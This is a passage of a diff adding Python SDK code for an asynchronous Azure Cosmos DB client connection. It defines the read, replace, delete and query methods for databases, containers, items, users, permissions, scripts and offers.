base.GetResourceIdOrFullNameFromLink(udf_link) + return await self.Read(path, "udfs", udf_id, None, options, **kwargs) + + async def ReadStoredProcedure(self, sproc_link, options=None, **kwargs): + """Reads a stored procedure. + + :param str sproc_link: + The link to the stored procedure. + :param dict options: + The request options for the request. + + :return: + The read Stored Procedure. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(sproc_link) + sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link) + return await self.Read(path, "sprocs", sproc_id, None, options, **kwargs) + + async def ReadTrigger(self, trigger_link, options=None, **kwargs): + """Reads a trigger. + + :param str trigger_link: + The link to the trigger. + :param dict options: + The request options for the request. + + :return: + The read Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(trigger_link) + trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link) + return await self.Read(path, "triggers", trigger_id, None, options, **kwargs) + + async def ReadConflict(self, conflict_link, options=None, **kwargs): + """Reads a conflict. + + :param str conflict_link: + The link to the conflict. + :param dict options: + + :return: + The read Conflict. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(conflict_link) + conflict_id = base.GetResourceIdOrFullNameFromLink(conflict_link) + return await self.Read(path, "conflicts", conflict_id, None, options, **kwargs) + + async def Read(self, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin + """Reads a Azure Cosmos resource and returns it. + + :param str path: + :param str typ: + :param str id: + :param dict initial_headers: + :param dict options: + The request options for the request. + + :return: + The upserted Azure Cosmos resource. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "get", path, id, typ, options) + # Read will use ReadEndpoint since it uses GET operation + request_params = _request_object.RequestObject(typ, documents._OperationType.Read) + result, self.last_response_headers = await self.__Get(path, request_params, headers, **kwargs) + return result + + async def __Get(self, path, request_params, req_headers, **kwargs): + """Azure Cosmos 'GET' async async http request. + + :params str url: + :params str path: + :params dict req_headers: + + :return: + Tuple of (result, headers). + :rtype: + tuple of (dict, dict) + + """ + request = self.pipeline_client.get(url=path, headers=req_headers) + return await asynchronous_request.AsynchronousRequest( + client=self, + request_params=request_params, + global_endpoint_manager=self._global_endpoint_manager, + connection_policy=self.connection_policy, + pipeline_client=self.pipeline_client, + request=request, + request_data=None, + **kwargs + ) + + async def ReplaceUser(self, user_link, user, options=None, **kwargs): + """Replaces a user and return it. + + :param str user_link: + The link to the user entity. + :param dict user: + :param dict options: + The request options for the request. + + :return: + The new User. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(user) + path = base.GetPathFromLink(user_link) + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return await self.Replace(user, path, "users", user_id, None, options, **kwargs) + + async def ReplacePermission(self, permission_link, permission, options=None, **kwargs): + """Replaces a permission and return it. + + :param str permission_link: + The link to the permission. + :param dict permission: + :param dict options: + The request options for the request. + + :return: + The new Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(permission) + path = base.GetPathFromLink(permission_link) + permission_id = base.GetResourceIdOrFullNameFromLink(permission_link) + return await self.Replace(permission, path, "permissions", permission_id, None, options, **kwargs) + + async def ReplaceContainer(self, collection_link, collection, options=None, **kwargs): + """Replaces a collection and return it. + + :param str collection_link: + The link to the collection entity. + :param dict collection: + The collection to be used. + :param dict options: + The request options for the request. + + :return: + The new Collection. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(collection) + path = base.GetPathFromLink(collection_link) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return await self.Replace(collection, path, "colls", collection_id, None, options, **kwargs) + + async def ReplaceUserDefinedFunction(self, udf_link, udf, options=None, **kwargs): + """Replaces a user-defined function and returns it. + + :param str udf_link: + The link to the user-defined function. + :param dict udf: + :param dict options: + The request options for the request. + + :return: + The new UDF. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(udf) + udf = udf.copy() + if udf.get("serverScript"): + udf["body"] = str(udf.pop("serverScript", "")) + elif udf.get("body"): + udf["body"] = str(udf["body"]) + + path = base.GetPathFromLink(udf_link) + udf_id = base.GetResourceIdOrFullNameFromLink(udf_link) + return await self.Replace(udf, path, "udfs", udf_id, None, options, **kwargs) + + async def ReplaceTrigger(self, trigger_link, trigger, options=None, **kwargs): + """Replaces a trigger and returns it. + + :param str trigger_link: + The link to the trigger. + :param dict trigger: + :param dict options: + The request options for the request. + + :return: + The replaced Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(trigger) + trigger = trigger.copy() + if trigger.get("serverScript"): + trigger["body"] = str(trigger.pop("serverScript", "")) + elif trigger.get("body"): + trigger["body"] = str(trigger["body"]) + + path = base.GetPathFromLink(trigger_link) + trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link) + return await self.Replace(trigger, path, "triggers", trigger_id, None, options, **kwargs) + + async def ReplaceItem(self, document_link, new_document, options=None, **kwargs): + """Replaces a document and returns it. + + :param str document_link: + The link to the document. + :param dict new_document: + :param dict options: + The request options for the request. + + :return: + The new Document. + :rtype: + dict + + """ + CosmosClientConnection.__ValidateResource(new_document) + path = base.GetPathFromLink(document_link) + document_id = base.GetResourceIdOrFullNameFromLink(document_link) + + # Python's default arguments are evaluated once when the function is defined, + # not each time the function is called (like it is in say, Ruby). This means + # that if you use a mutable default argument and mutate it, you will and have + # mutated that object for all future calls to the function as well. So, using + # a non-mutable deafult in this case(None) and assigning an empty dict(mutable) + # inside the function so that it remains local For more details on this gotcha, + # please refer http://docs.python-guide.org/en/latest/writing/gotchas/ + if options is None: + options = {} + + # Extract the document collection link and add the partition key to options + collection_link = base.GetItemContainerLink(document_link) + options = await self._AddPartitionKey(collection_link, new_document, options) + + return await self.Replace(new_document, path, "docs", document_id, None, options, **kwargs) + + async def ReplaceOffer(self, offer_link, offer, **kwargs): + """Replaces an offer and returns it. + + :param str offer_link: + The link to the offer. + :param dict offer: + + :return: + The replaced Offer. + :rtype: + dict + + """ + CosmosClientConnection.__ValidateResource(offer) + path = base.GetPathFromLink(offer_link) + offer_id = base.GetResourceIdOrFullNameFromLink(offer_link) + return await self.Replace(offer, path, "offers", offer_id, None, None, **kwargs) + + async def ReplaceStoredProcedure(self, sproc_link, sproc, options=None, **kwargs): + """Replaces a stored procedure and returns it. + + :param str sproc_link: + The link to the stored procedure. + :param dict sproc: + :param dict options: + The request options for the request. + + :return: + The replaced Stored Procedure. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(sproc) + sproc = sproc.copy() + if sproc.get("serverScript"): + sproc["body"] = str(sproc.pop("serverScript", "")) + elif sproc.get("body"): + sproc["body"] = str(sproc["body"]) + + path = base.GetPathFromLink(sproc_link) + sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link) + return await self.Replace(sproc, path, "sprocs", sproc_id, None, options, **kwargs) + + async def Replace(self, resource, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin + """Replaces a Azure Cosmos resource and returns it. + + :param dict resource: + :param str path: + :param str typ: + :param str id: + :param dict initial_headers: + :param dict options: + The request options for the request. + + :return: + The new Azure Cosmos resource. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "put", path, id, typ, options) + # Replace will use WriteEndpoint since it uses PUT operation + request_params = _request_object.RequestObject(typ, documents._OperationType.Replace) + result, self.last_response_headers = await self.__Put(path, request_params, resource, headers, **kwargs) + + # update session for request mutates data on server side + self._UpdateSessionIfRequired(headers, result, self.last_response_headers) + return result + + async def __Put(self, path, request_params, body, req_headers, **kwargs): + """Azure Cosmos 'PUT' async http request. + + :params str url: + :params str path: + :params (str, unicode, dict) body: + :params dict req_headers: + + :return: + Tuple of (result, headers). + :rtype: + tuple of (dict, dict) + + """ + request = self.pipeline_client.put(url=path, headers=req_headers) + return await asynchronous_request.AsynchronousRequest( + client=self, + request_params=request_params, + global_endpoint_manager=self._global_endpoint_manager, + connection_policy=self.connection_policy, + pipeline_client=self.pipeline_client, + request=request, + request_data=body, + **kwargs + ) + + async def DeleteDatabase(self, database_link, options=None, **kwargs): + """Deletes a database. + + :param str database_link: + The link to the database. + :param dict options: + The request options for the request. + + :return: + The deleted Database. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link) + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return await self.DeleteResource(path, "dbs", database_id, None, options, **kwargs) + + async def DeleteUser(self, user_link, options=None, **kwargs): + """Deletes a user. + + :param str user_link: + The link to the user entity. + :param dict options: + The request options for the request. + + :return: + The deleted user. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(user_link) + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return await self.DeleteResource(path, "users", user_id, None, options, **kwargs) + + async def DeletePermission(self, permission_link, options=None, **kwargs): + """Deletes a permission. + + :param str permission_link: + The link to the permission. + :param dict options: + The request options for the request. + + :return: + The deleted Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(permission_link) + permission_id = base.GetResourceIdOrFullNameFromLink(permission_link) + return await self.DeleteResource(path, "permissions", permission_id, None, options, **kwargs) + + async def DeleteContainer(self, collection_link, options=None, **kwargs): + """Deletes a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + The deleted Collection. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return await self.DeleteResource(path, "colls", collection_id, None, options, **kwargs) + + async def DeleteItem(self, document_link, options=None, **kwargs): + """Deletes a document. + + :param str document_link: + The link to the document. + :param dict options: + The request options for the request. + + :return: + The deleted Document. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(document_link) + document_id = base.GetResourceIdOrFullNameFromLink(document_link) + return await self.DeleteResource(path, "docs", document_id, None, options, **kwargs) + + async def DeleteUserDefinedFunction(self, udf_link, options=None, **kwargs): + """Deletes a user-defined function. + + :param str udf_link: + The link to the user-defined function. + :param dict options: + The request options for the request. + + :return: + The deleted UDF. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(udf_link) + udf_id = base.GetResourceIdOrFullNameFromLink(udf_link) + return await self.DeleteResource(path, "udfs", udf_id, None, options, **kwargs) + + async def DeleteTrigger(self, trigger_link, options=None, **kwargs): + """Deletes a trigger. + + :param str trigger_link: + The link to the trigger. + :param dict options: + The request options for the request. + + :return: + The deleted Trigger. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(trigger_link) + trigger_id = base.GetResourceIdOrFullNameFromLink(trigger_link) + return await self.DeleteResource(path, "triggers", trigger_id, None, options, **kwargs) + + async def DeleteStoredProcedure(self, sproc_link, options=None, **kwargs): + """Deletes a stored procedure. + + :param str sproc_link: + The link to the stored procedure. + :param dict options: + The request options for the request. + + :return: + The deleted Stored Procedure. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(sproc_link) + sproc_id = base.GetResourceIdOrFullNameFromLink(sproc_link) + return await self.DeleteResource(path, "sprocs", sproc_id, None, options, **kwargs) + + async def DeleteConflict(self, conflict_link, options=None, **kwargs): + """Deletes a conflict. + + :param str conflict_link: + The link to the conflict. + :param dict options: + The request options for the request. + + :return: + The deleted Conflict. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(conflict_link) + conflict_id = base.GetResourceIdOrFullNameFromLink(conflict_link) + return await self.DeleteResource(path, "conflicts", conflict_id, None, options, **kwargs) + + async def DeleteResource(self, path, typ, id, initial_headers, options=None, **kwargs): # pylint: disable=redefined-builtin + """Deletes a Azure Cosmos resource and returns it. + + :param str path: + :param str typ: + :param str id: + :param dict initial_headers: + :param dict options: + The request options for the request. + + :return: + The deleted Azure Cosmos resource. + :rtype: + dict + + """ + if options is None: + options = {} + + initial_headers = initial_headers or self.default_headers + headers = base.GetHeaders(self, initial_headers, "delete", path, id, typ, options) + # Delete will use WriteEndpoint since it uses DELETE operation + request_params = _request_object.RequestObject(typ, documents._OperationType.Delete) + result, self.last_response_headers = await self.__Delete(path, request_params, headers, **kwargs) + + # update session for request mutates data on server side + self._UpdateSessionIfRequired(headers, result, self.last_response_headers) + + return result + + async def __Delete(self, path, request_params, req_headers, **kwargs): + """Azure Cosmos 'DELETE' async http request. + + :params str url: + :params str path: + :params dict req_headers: + + :return: + Tuple of (result, headers). + :rtype: + tuple of (dict, dict) + + """ + request = self.pipeline_client.delete(url=path, headers=req_headers) + return await asynchronous_request.AsynchronousRequest( + client=self, + request_params=request_params, + global_endpoint_manager=self._global_endpoint_manager, + connection_policy=self.connection_policy, + pipeline_client=self.pipeline_client, + request=request, + request_data=None, + **kwargs + ) + + def _ReadPartitionKeyRanges(self, collection_link, feed_options=None, **kwargs): + """Reads Partition Key Ranges. + + :param str collection_link: + The link to the document collection. + :param dict feed_options: + + :return: + Query Iterable of PartitionKeyRanges. + :rtype: + query_iterable.QueryIterable + + """ + if feed_options is None: + feed_options = {} + + return self._QueryPartitionKeyRanges(collection_link, None, feed_options, **kwargs) + + def _QueryPartitionKeyRanges(self, collection_link, query, options=None, **kwargs): + """Queries Partition Key Ranges in a collection. + + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of PartitionKeyRanges. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "pkranges") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, "pkranges", collection_id, lambda r: r["PartitionKeyRanges"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadDatabases(self, options=None, **kwargs): + """Reads all databases. + + :param dict options: + The request options for the request. + + :return: + Query Iterable of Databases. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryDatabases(None, options, **kwargs) + + def QueryDatabases(self, query, options=None, **kwargs): + """Queries databases. + + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: Query Iterable of Databases. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + "/dbs", "dbs", "", lambda r: r["Databases"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadContainers(self, database_link, options=None, **kwargs): + """Reads all collections in a database. + + :param str database_link: + The link to the database. + :param dict options: + The request options for the request. + + :return: Query Iterable of Collections. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryContainers(database_link, None, options, **kwargs) + + def QueryContainers(self, database_link, query, options=None, **kwargs): + """Queries collections in a database. + + :param str database_link: + The link to the database. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: Query Iterable of Collections. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link, "colls") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, "colls", database_id, lambda r: r["DocumentCollections"], + lambda _, body: body, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadItems(self, collection_link, feed_options=None, response_hook=None, **kwargs): + """Reads all documents in a collection. + + :param str collection_link: + The link to the document collection. + :param dict feed_options: + + :return: + Query Iterable of Documents. + :rtype: + query_iterable.QueryIterable + + """ + if feed_options is None: + feed_options = {} + + return self.QueryItems(collection_link, None, feed_options, response_hook=response_hook, **kwargs) + + def QueryItems( + self, + database_or_container_link, + query, + options=None, + partition_key=None, + response_hook=None, + **kwargs + ): + """Queries documents in a collection. + + :param str database_or_container_link: + The link to the database when using partitioning, otherwise link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + :param str partition_key: + Partition key for the query(default value None) + :param response_hook: + A callable invoked with the response metadata + + :return: + Query Iterable of Documents. + :rtype: + query_iterable.QueryIterable + + """ + database_or_container_link = base.TrimBeginningAndEndingSlashes(database_or_container_link) + + if options is None: + options = {} + + if base.IsDatabaseLink(database_or_container_link): + return AsyncItemPaged( + self, + query, + options, + database_link=database_or_container_link, + partition_key=partition_key, + page_iterator_class=query_iterable.QueryIterable + ) + + path = base.GetPathFromLink(database_or_container_link, "docs") + collection_id = base.GetResourceIdOrFullNameFromLink(database_or_container_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, + "docs", + collection_id, + lambda r: r["Documents"], + lambda _, b: b, + query, + options, + response_hook=response_hook, + **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, + query, + options, + fetch_function=fetch_fn, + collection_link=database_or_container_link, + page_iterator_class=query_iterable.QueryIterable + ) + + def QueryItemsChangeFeed(self, collection_link, options=None, response_hook=None, **kwargs): + """Queries documents change feed in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + options may also specify partition key range id. + :param response_hook: + A callable invoked with the response metadata + + :return: + Query Iterable of Documents. + :rtype: + query_iterable.QueryIterable + + """ + + partition_key_range_id = None + if options is not None and "partitionKeyRangeId" in options: + partition_key_range_id = options["partitionKeyRangeId"] + + return self._QueryChangeFeed( + collection_link, "Documents", options, partition_key_range_id, response_hook=response_hook, **kwargs + ) + + def _QueryChangeFeed( + self, collection_link, resource_type, options=None, partition_key_range_id=None, response_hook=None, **kwargs + ): + """Queries change feed of a resource in a collection. + + :param str collection_link: + The link to the document collection. + :param str resource_type: + The type of the resource. + :param dict options: + The request options for the request. + :param str partition_key_range_id: + Specifies partition key range id. + :param response_hook: + A callable invoked with the response metadata + + :return: + Query Iterable of Documents. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + options["changeFeed"] = True + + resource_key_map = {"Documents": "docs"} + + # For now, change feed only supports Documents and Partition Key Range resouce type + if resource_type not in resource_key_map: + raise NotImplementedError(resource_type + " change feed query is not supported.") + + resource_key = resource_key_map[resource_type] + path = base.GetPathFromLink(collection_link, resource_key) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, + resource_key, + collection_id, + lambda r: r[resource_type], + lambda _, b: b, + None, + options, + partition_key_range_id, + response_hook=response_hook, + **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, + None, + options, + fetch_function=fetch_fn, + collection_link=collection_link, + page_iterator_class=query_iterable.QueryIterable + ) + + def QueryOffers(self, query, options=None, **kwargs): + """Query for all offers. + + :param (str or dict) query: + :param dict options: + The request options for the request + + :return: + Query Iterable of Offers. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + "/offers", "offers", "", lambda r: r["Offers"], lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, + query, + options, + fetch_function=fetch_fn, + page_iterator_class=query_iterable.QueryIterable + ) + + def ReadUsers(self, database_link, options=None, **kwargs): + """Reads all users in a database. + + :params str database_link: + The link to the database. + :params dict options: + The request options for the request. + :return: + Query iterable of Users. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryUsers(database_link, None, options, **kwargs) + + def QueryUsers(self, database_link, query, options=None, **kwargs): + """Queries users in a database. + + :param str database_link: + The link to the database. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Users. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link, "users") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, "users", database_id, lambda r: r["Users"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadPermissions(self, user_link, options=None, **kwargs): + """Reads all permissions for a user. + + :param str user_link: + The link to the user entity. + :param dict options: + The request options for the request. + + :return: + Query Iterable of Permissions. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryPermissions(user_link, None, options, **kwargs) + + def QueryPermissions(self, user_link, query, options=None, **kwargs): + """Queries permissions for a user. + + :param str user_link: + The link to the user entity. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Permissions. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(user_link, "permissions") + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, "permissions", user_id, lambda r: r["Permissions"], lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadStoredProcedures(self, collection_link, options=None, **kwargs): + """Reads all store procedures in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + Query Iterable of Stored Procedures. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryStoredProcedures(collection_link, None, options, **kwargs) + + def QueryStoredProcedures(self, collection_link, query, options=None, **kwargs): + """Queries stored procedures in a collection. + + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Stored Procedures. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "sprocs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, "sprocs", collection_id, lambda r: r["StoredProcedures"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadTriggers(self, collection_link, options=None, **kwargs): + """Reads all triggers in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + Query Iterable of Triggers. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryTriggers(collection_link, None, options, **kwargs) + + def QueryTriggers(self, collection_link, query, options=None, **kwargs): + """Queries triggers in a collection. + + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Triggers. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "triggers") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, "triggers", collection_id, lambda r: r["Triggers"], lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadUserDefinedFunctions(self, collection_link, options=None, **kwargs): + """Reads all user-defined functions in a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + Query Iterable of UDFs. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryUserDefinedFunctions(collection_link, None, options, **kwargs) + + def QueryUserDefinedFunctions(self, collection_link, query, options=None, **kwargs): + """Queries user-defined functions in a collection. + + :param str collection_link: + The link to the collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of UDFs. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "udfs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, "udfs", collection_id, lambda r: r["UserDefinedFunctions"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadConflicts(self, collection_link, feed_options=None, **kwargs): + """Reads conflicts. + + :param str collection_link: + The link to the document collection. + :param dict feed_options: + + :return: + Query Iterable of Conflicts. + :rtype: + query_iterable.QueryIterable + + """ + if feed_options is None: + feed_options = {} + + return self.QueryConflicts(collection_link, None, feed_options, **kwargs) + + def QueryConflicts(self, collection_link, query, options=None, **kwargs): + """Queries conflicts in a collection. + + :param str collection_link: + The link to the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Conflicts. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link, "conflicts") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + + async def fetch_fn(options): + return ( + await self.__QueryFeed( + path, "conflicts", collection_id, lambda r: r["Conflicts"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return AsyncItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + async def QueryFeed(self, path, collection_id, query, options, partition_key_range_id=None, **kwargs): + """Query Feed for Document Collection resource. + + :param str path: + Path to the document collection. + :param str collection_id: + Id of the document collection. + :param (str or dict) query: + :param dict options: + The request options for the request. + :param str partition_key_range_id: + Partition key range id. + :rtype: + tuple + + """ + return ( + await self.__QueryFeed( + path, + "docs", + collection_id, + lambda r: r["Documents"], + lambda _, b: b, + query, + options, + partition_key_range_id, + **kwargs + ), + self.last_response_headers, + ) + + async def __QueryFeed( + self, + path, + typ, + id_, + result_fn, + create_fn, + query, + options=None, + partition_key_range_id=None, + response_hook=None, + is_query_plan=False, + **kwargs + ): + """Query for more than one Azure Cosmos resources. + + :param str path: + :param str typ: + :param str id_: + :param function result_fn: + :param function create_fn: + :param (str or dict) query: + :param dict options: + The request options for the request. + :param str partition_key_range_id: + Specifies partition key range id. + :param function response_hook: + :param bool is_query_plan: + Specififes if the call is to fetch query plan + + :rtype: + list + + :raises SystemError: If the query compatibility mode is undefined. + + """ + if options is None: + options = {} + + if query: + __GetBodiesFromQueryResult = result_fn + else: + + def __GetBodiesFromQueryResult(result): + if result is not None: + return [create_fn(self, body) for body in result_fn(result)] + # If there is no change feed, the result data is empty and result is None. + # This case should be interpreted as an empty array. + return [] + + initial_headers = self.default_headers.copy() + # Copy to make sure that default_headers won't be changed. + if query is None: + # Query operations will use ReadEndpoint even though it uses GET(for feed requests) + request_params = _request_object.RequestObject(typ, + documents._OperationType.QueryPlan if is_query_plan else documents._OperationType.ReadFeed) + headers = base.GetHeaders(self, initial_headers, "get", path, id_, typ, options, partition_key_range_id) + result, self.last_response_headers = await self.__Get(path, request_params, headers, **kwargs) + if response_hook: + response_hook(self.last_response_headers, result) + return __GetBodiesFromQueryResult(result) + + query = self.__CheckAndUnifyQueryFormat(query) + + initial_headers[http_constants.HttpHeaders.IsQuery] = "true" + if not is_query_plan: + initial_headers[http_constants.HttpHeaders.IsQuery] = "true" + + if ( + self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Default + or self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Query + ): + initial_headers[http_constants.HttpHeaders.ContentType] = runtime_constants.MediaTypes.QueryJson + elif self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.SqlQuery: + initial_headers[http_constants.HttpHeaders.ContentType] = runtime_constants.MediaTypes.SQL + else: + raise SystemError("Unexpected query compatibility mode.") + + # Query operations will use ReadEndpoint even though it uses POST(for regular query operations) + request_params = _request_object.RequestObject(typ, documents._OperationType.SqlQuery) + req_headers = base.GetHeaders(self, initial_headers, "post", path, id_, typ, options, partition_key_range_id) + result, self.last_response_headers = await self.__Post(path, request_params, query, req_headers, **kwargs) + + if response_hook: + response_hook(self.last_response_headers, result) + + return __GetBodiesFromQueryResult(result) + + def __CheckAndUnifyQueryFormat(self, query_body): + """Checks and unifies the format of the query body. + + :raises TypeError: If query_body is not of expected type (depending on the query compatibility mode). + :raises ValueError: If query_body is a dict but doesn\'t have valid query text. + :raises SystemError: If the query compatibility mode is undefined. + + :param (str or dict) query_body: + + :return: + The formatted query body. + :rtype: + dict or string + """ + if ( + self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Default + or self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.Query + ): + if not isinstance(query_body, dict) and not isinstance(query_body, str): + raise TypeError("query body must be a dict or string.") + if isinstance(query_body, dict) and not query_body.get("query"): + raise ValueError('query body must have valid query text with key "query".') + if isinstance(query_body, str): + return {"query": query_body} + elif ( + self._query_compatibility_mode == CosmosClientConnection._QueryCompatibilityMode.SqlQuery + and not isinstance(query_body, str) + ): + raise TypeError("query body must be a string.") + else: + raise SystemError("Unexpected query compatibility mode.") + + return query_body + + def _UpdateSessionIfRequired(self, request_headers, response_result, response_headers): + """ + Updates session if necessary. + + :param dict response_result: + :param dict response_headers: + :param dict response_headers + + :return: + None, but updates the client session if necessary. + + """ + + # if this request was made with consistency level as session, then update the session + if response_result is None or response_headers is None: + return + + is_session_consistency = False + if http_constants.HttpHeaders.ConsistencyLevel in request_headers: + if documents.ConsistencyLevel.Session == request_headers[http_constants.HttpHeaders.ConsistencyLevel]: + is_session_consistency = True + + if is_session_consistency: + # update session + self.session.update_session(response_result, response_headers) + 